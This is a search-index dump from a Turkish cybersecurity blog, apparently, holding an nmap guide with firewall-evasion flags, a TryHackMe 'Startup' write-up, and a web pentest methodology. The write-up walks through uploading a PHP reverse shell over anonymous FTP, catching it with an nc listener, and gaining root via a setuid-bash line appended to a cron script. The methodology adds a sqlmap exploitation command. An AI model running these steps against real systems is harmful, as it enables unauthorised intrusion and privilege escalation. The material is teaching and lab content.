class=\"s2\"\u003e\u0026#34;[+] \u003c/span\u003e\u003cspan class=\"si\"\u003e{\u003c/span\u003e\u003cspan class=\"n\"\u003eresult\u003c/span\u003e\u003cspan class=\"si\"\u003e}\u003c/span\u003e\u003cspan class=\"s2\"\u003e/tcp AÇIK\u0026#34;\u003c/span\u003e\u003cspan class=\"p\"\u003e)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"n\"\u003efast_scan\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"s2\"\u003e\u0026#34;192.168.1.1\u0026#34;\u003c/span\u003e\u003cspan class=\"p\"\u003e)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"önerilen-projeler\"\u003eÖnerilen Projeler\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003ePort Tarayıcı\u003c/li\u003e\n\u003cli\u003eAlt Alan Adı Sayım Aracı\u003c/li\u003e\n\u003cli\u003eWeb Dizin Brute-forcer\u003c/li\u003e\n\u003cli\u003eScapy ile Paket Dinleyici\u003c/li\u003e\n\u003c/ol\u003e","title":"Hackerlar için Python — Temellerden Gerçek Araçlara"},{"content":"Kullanım Şartları Son güncelleme: 19 Nisan 2026\nEtik Kullanım Bu blogdaki tüm eğitim içerikleri yalnızca etik öğrenme amaçları için tasarlanmıştır. Bilgilerin yasadışı amaçlarla kullanılması kesinlikle yasaktır.\nFikri Mülkiyet Tüm orijinal içerikler telif hakkıyla korunmaktadır. Kaynak göstererek içerik paylaşabilirsiniz.\nSorumluluk Reddi Blog, bilgileri \u0026ldquo;olduğu gibi\u0026rdquo; sağlar ve garanti vermez. Bilgilerin yanlış kullanımından sorumlu değiliz.\n","permalink":"https://cyberah-blog.pages.dev/tr/terms/","summary":"\u003ch2 id=\"kullanım-şartları\"\u003eKullanım Şartları\u003c/h2\u003e\n\u003cp\u003eSon güncelleme: 19 Nisan 2026\u003c/p\u003e\n\u003ch3 id=\"etik-kullanım\"\u003eEtik Kullanım\u003c/h3\u003e\n\u003cp\u003eBu blogdaki tüm eğitim içerikleri \u003cstrong\u003eyalnızca etik öğrenme amaçları\u003c/strong\u003e için tasarlanmıştır. Bilgilerin yasadışı amaçlarla kullanılması kesinlikle yasaktır.\u003c/p\u003e\n\u003ch3 id=\"fikri-mülkiyet\"\u003eFikri Mülkiyet\u003c/h3\u003e\n\u003cp\u003eTüm orijinal içerikler telif hakkıyla korunmaktadır. Kaynak göstererek içerik paylaşabilirsiniz.\u003c/p\u003e\n\u003ch3 id=\"sorumluluk-reddi\"\u003eSorumluluk Reddi\u003c/h3\u003e\n\u003cp\u003eBlog, bilgileri \u0026ldquo;olduğu gibi\u0026rdquo; sağlar ve garanti vermez. Bilgilerin yanlış kullanımından sorumlu değiliz.\u003c/p\u003e","title":"Kullanım Şartları"},{"content":"Nmap Nedir? Nmap, etik hackerlar ve güvenlik uzmanları tarafından kullanılan dünyanın en güçlü ağ tarama aracıdır.\nTemel Kullanım # Hızlı tarama nmap -F 192.168.1.1 # Tüm portlar nmap -p- 192.168.1.1 # Kapsamlı tarama nmap -sV -sC -O -p- --min-rate 5000 192.168.1.1 NSE Scriptleri # Varsayılan scriptler nmap -sC 192.168.1.1 # Güvenlik açığı taraması nmap --script vuln 192.168.1.1 # SMB EternalBlue kontrolü nmap --script=smb-vuln-ms17-010 192.168.1.1 Güvenlik Duvarı Atlatma # Paket parçalama nmap -f 192.168.1.1 # Sahte IP\u0026#39;ler ekleme nmap -D RND:10 192.168.1.1 # Kaynak port değiştirme nmap --source-port 53 192.168.1.1 Çıktı Kaydetme nmap -oN output.txt 192.168.1.1 nmap -oA all_formats 192.168.1.1 ","permalink":"https://cyberah-blog.pages.dev/tr/tools/nmap-complete-guide/","summary":"\u003ch2 id=\"nmap-nedir\"\u003eNmap Nedir?\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eNmap\u003c/strong\u003e, etik hackerlar ve güvenlik uzmanları tarafından kullanılan dünyanın en güçlü ağ tarama aracıdır.\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"temel-kullanım\"\u003eTemel Kullanım\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# Hızlı tarama\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enmap -F 192.168.1.1\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# Tüm portlar\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enmap -p- 192.168.1.1\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# Kapsamlı tarama\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enmap -sV -sC -O -p- --min-rate \u003cspan class=\"m\"\u003e5000\u003c/span\u003e 192.168.1.1\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"nse-scriptleri\"\u003eNSE Scriptleri\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# Varsayılan scriptler\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enmap -sC 192.168.1.1\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# Güvenlik açığı taraması\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enmap --script vuln 192.168.1.1\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# SMB EternalBlue kontrolü\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enmap --script\u003cspan class=\"o\"\u003e=\u003c/span\u003esmb-vuln-ms17-010 192.168.1.1\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"güvenlik-duvarı-atlatma\"\u003eGüvenlik Duvarı Atlatma\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# Paket parçalama\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enmap -f 192.168.1.1\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# Sahte IP\u0026#39;ler ekleme\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enmap -D RND:10 192.168.1.1\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# Kaynak port değiştirme\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enmap --source-port \u003cspan class=\"m\"\u003e53\u003c/span\u003e 192.168.1.1\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"çıktı-kaydetme\"\u003eÇıktı Kaydetme\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enmap -oN output.txt 192.168.1.1\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enmap -oA all_formats 192.168.1.1\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e","title":"Nmap Tam Kılavuzu — Başlangıçtan Uzmana"},{"content":"\nBox Info Field Details Platform TryHackMe Difficulty Easy OS Linux Skills FTP, File Upload RCE, Cron Privesc Phase 1: Reconnaissance nmap -sV -sC -p- --min-rate 5000 10.10.X.X # Results: # PORT STATE SERVICE VERSION # 21/tcp open ftp vsftpd 3.0.3 # 22/tcp open ssh OpenSSH 7.2p2 # 80/tcp open http Apache 2.4.18 Phase 2: FTP Anonymous Access ftp 10.10.X.X # Username: anonymous # Password: (empty) ftp\u0026gt; ls -la # Found: notice.txt, important.jpg ftp\u0026gt; get notice.txt ftp\u0026gt; get important.jpg Phase 3: Web Enumeration gobuster dir -u http://10.10.X.X -w /usr/share/wordlists/dirb/common.txt # Found: # /files (200) ← Shared with FTP! Phase 4: RCE via PHP Shell Upload # Upload PHP reverse shell via FTP ftp 10.10.X.X ftp\u0026gt; put shell.php # Start listener nc -lvnp 4444 # Trigger shell via browser: # http://10.10.X.X/files/shell.php We have a shell!\npython3 -c \u0026#39;import pty;pty.spawn(\u0026#34;/bin/bash\u0026#34;)\u0026#39; export TERM=xterm Phase 5: Privilege Escalation # Check cron jobs cat /etc/crontab # Found: writable script running as root echo \u0026#34;chmod +s /bin/bash\u0026#34; \u0026gt;\u0026gt; /path/to/script.sh # Wait for cron... /bin/bash -p # root# Flags user.txt: THM{XXXXXXXXXXXXXXXXXX} root.txt: THM{XXXXXXXXXXXXXXXXXX} Lessons Learned Anonymous FTP should always be disabled on production systems Sharing FTP directories with the web root is a critical RCE vulnerability Cron jobs running as root with writable scripts = trivial privilege escalation ","permalink":"https://cyberah-blog.pages.dev/tr/writeups/thm/thm-startup/","summary":"\u003cp\u003e\u003cimg alt=\"Startup Room Banner\" loading=\"lazy\" src=\"/images/2.jpg\"\u003e\u003c/p\u003e\n\u003ch2 id=\"box-info\"\u003eBox Info\u003c/h2\u003e\n\u003ctable\u003e\n  \u003cthead\u003e\n      \u003ctr\u003e\n          \u003cth\u003eField\u003c/th\u003e\n          \u003cth\u003eDetails\u003c/th\u003e\n      \u003c/tr\u003e\n  \u003c/thead\u003e\n  \u003ctbody\u003e\n      \u003ctr\u003e\n          \u003ctd\u003ePlatform\u003c/td\u003e\n          \u003ctd\u003eTryHackMe\u003c/td\u003e\n      \u003c/tr\u003e\n      \u003ctr\u003e\n          \u003ctd\u003eDifficulty\u003c/td\u003e\n          \u003ctd\u003eEasy\u003c/td\u003e\n      \u003c/tr\u003e\n      \u003ctr\u003e\n          \u003ctd\u003eOS\u003c/td\u003e\n          \u003ctd\u003eLinux\u003c/td\u003e\n      \u003c/tr\u003e\n      \u003ctr\u003e\n          \u003ctd\u003eSkills\u003c/td\u003e\n          \u003ctd\u003eFTP, File Upload RCE, Cron Privesc\u003c/td\u003e\n      \u003c/tr\u003e\n  \u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"phase-1-reconnaissance\"\u003ePhase 1: Reconnaissance\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enmap -sV -sC -p- --min-rate \u003cspan class=\"m\"\u003e5000\u003c/span\u003e 10.10.X.X\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# Results:\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# PORT   STATE SERVICE VERSION\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# 21/tcp open  ftp     vsftpd 3.0.3\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# 22/tcp open  ssh     OpenSSH 7.2p2\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# 80/tcp open  http    Apache 2.4.18\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"phase-2-ftp-anonymous-access\"\u003ePhase 2: FTP Anonymous Access\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eftp 10.10.X.X\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# Username: anonymous\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# Password: (empty)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eftp\u0026gt; ls -la\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# Found: notice.txt, important.jpg\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eftp\u0026gt; get notice.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eftp\u0026gt; get important.jpg\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"phase-3-web-enumeration\"\u003ePhase 3: Web Enumeration\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003egobuster dir -u http://10.10.X.X -w /usr/share/wordlists/dirb/common.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# Found:\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# /files (200)  ← Shared with FTP!\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"phase-4-rce-via-php-shell-upload\"\u003ePhase 4: RCE via PHP Shell Upload\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# Upload PHP reverse shell via FTP\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eftp 10.10.X.X\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eftp\u0026gt; put shell.php\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# Start listener\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enc -lvnp \u003cspan class=\"m\"\u003e4444\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# Trigger shell via browser:\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# http://10.10.X.X/files/shell.php\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\u003cstrong\u003eWe have a shell!\u003c/strong\u003e\u003c/p\u003e","title":"TryHackMe — Startup | Full Writeup"},{"content":"Aşama 1: Keşif (Reconnaissance) Keşif, başarılı bir sızma testinin temelidir.\nPasif Keşif — Hedefle Temas Etmeden # DNS bilgi toplama whois target.com dig target.com ANY subfinder -d target.com -o subdomains.txt # Google Dorks site:target.com filetype:pdf site:target.com inurl:admin # Shodan ile altyapı istihbaratı shodan search hostname:target.com Aktif Keşif — Doğrudan Tarama # Port ve servis taraması nmap -sV -sC -p- --min-rate 5000 -oN scan.txt target.com # Dizin keşfi ffuf -u https://target.com/FUZZ -w /usr/share/wordlists/dirb/common.txt -fc 404 Aşama 2: Sayım (Enumeration) whatweb -a 3 https://target.com nikto -h https://target.com -ssl Aşama 3: Güvenlik Açığı Keşfi OWASP Top 10 — Kontrol Listesi Güvenlik Açığı Öncelik Araçlar SQL Injection 🔴 Yüksek sqlmap, manuel XSS 🟡 Orta XSStrike, Dalfox SSRF 🔴 Yüksek Manuel, Burp Suite IDOR 🟡 Orta Manuel Aşama 4: İstismar (Exploitation) ⚠️ Uyarı: Yalnızca test etmek için açık izniniz olan sistemleri istismar edin.\nsqlmap -u \u0026#34;https://target.com/page?id=1\u0026#34; --dbs --batch --level=5 Aşama 5: Raporlama İyi bir rapor şunları içermelidir: Yönetici Özeti, Teknik Detaylar, PoC Adımları, Düzeltme Önerileri.\n","permalink":"https://cyberah-blog.pages.dev/tr/notes/methodology-web-pentest/","summary":"\u003ch2 id=\"aşama-1-keşif-reconnaissance\"\u003eAşama 1: Keşif (Reconnaissance)\u003c/h2\u003e\n\u003cp\u003eKeşif, başarılı bir sızma testinin temelidir.\u003c/p\u003e\n\u003ch3 id=\"pasif-keşif--hedefle-temas-etmeden\"\u003ePasif Keşif — Hedefle Temas Etmeden\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# DNS bilgi toplama\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ewhois target.com\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003edig target.com ANY\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003esubfinder -d target.com -o subdomains.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# Google Dorks\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003esite:target.com filetype:pdf\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003esite:target.com inurl:admin\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# Shodan ile altyapı istihbaratı\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eshodan search hostname:target.com\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"aktif-keşif--doğrudan-tarama\"\u003eAktif Keşif — Doğrudan Tarama\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# Port ve servis taraması\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enmap -sV -sC -p- --min-rate \u003cspan class=\"m\"\u003e5000\u003c/span\u003e -oN scan.txt target.com\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# Dizin keşfi\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003effuf -u https://target.com/FUZZ -w /usr/share/wordlists/dirb/common.txt -fc \u003cspan class=\"m\"\u003e404\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"aşama-2-sayım-enumeration\"\u003eAşama 2: Sayım (Enumeration)\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ewhatweb -a \u003cspan class=\"m\"\u003e3\u003c/span\u003e https://target.com\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enikto -h https://target.com -ssl\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"aşama-3-güvenlik-açığı-keşfi\"\u003eAşama 3: Güvenlik Açığı Keşfi\u003c/h2\u003e\n\u003ch3 id=\"owasp-top-10--kontrol-listesi\"\u003eOWASP Top 10 — Kontrol Listesi\u003c/h3\u003e\n\u003ctable\u003e\n  \u003cthead\u003e\n      \u003ctr\u003e\n          \u003cth\u003eGüvenlik Açığı\u003c/th\u003e\n          \u003cth\u003eÖncelik\u003c/th\u003e\n          \u003cth\u003eAraçlar\u003c/th\u003e\n      \u003c/tr\u003e\n  \u003c/thead\u003e\n  \u003ctbody\u003e\n      \u003ctr\u003e\n          \u003ctd\u003eSQL Injection\u003c/td\u003e\n          \u003ctd\u003e🔴 Yüksek\u003c/td\u003e\n          \u003ctd\u003esqlmap, manuel\u003c/td\u003e\n      \u003c/tr\u003e\n      \u003ctr\u003e\n          \u003ctd\u003eXSS\u003c/td\u003e\n          \u003ctd\u003e🟡 Orta\u003c/td\u003e\n          \u003ctd\u003eXSStrike, Dalfox\u003c/td\u003e\n      \u003c/tr\u003e\n      \u003ctr\u003e\n          \u003ctd\u003eSSRF\u003c/td\u003e\n          \u003ctd\u003e🔴 Yüksek\u003c/td\u003e\n          \u003ctd\u003eManuel, Burp Suite\u003c/td\u003e\n      \u003c/tr\u003e\n      \u003ctr\u003e\n          \u003ctd\u003eIDOR\u003c/td\u003e\n          \u003ctd\u003e🟡 Orta\u003c/td\u003e\n          \u003ctd\u003eManuel\u003c/td\u003e\n      \u003c/tr\u003e\n  \u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"aşama-4-istismar-exploitation\"\u003eAşama 4: İstismar (Exploitation)\u003c/h2\u003e\n\u003cblockquote\u003e\n\u003cp\u003e⚠️ \u003cstrong\u003eUyarı\u003c/strong\u003e: Yalnızca test etmek için açık izniniz olan sistemleri istismar edin.\u003c/p\u003e","title":"Web Sızma Testi Metodolojisi — Sıfırdan Ele Geçirmeye"}]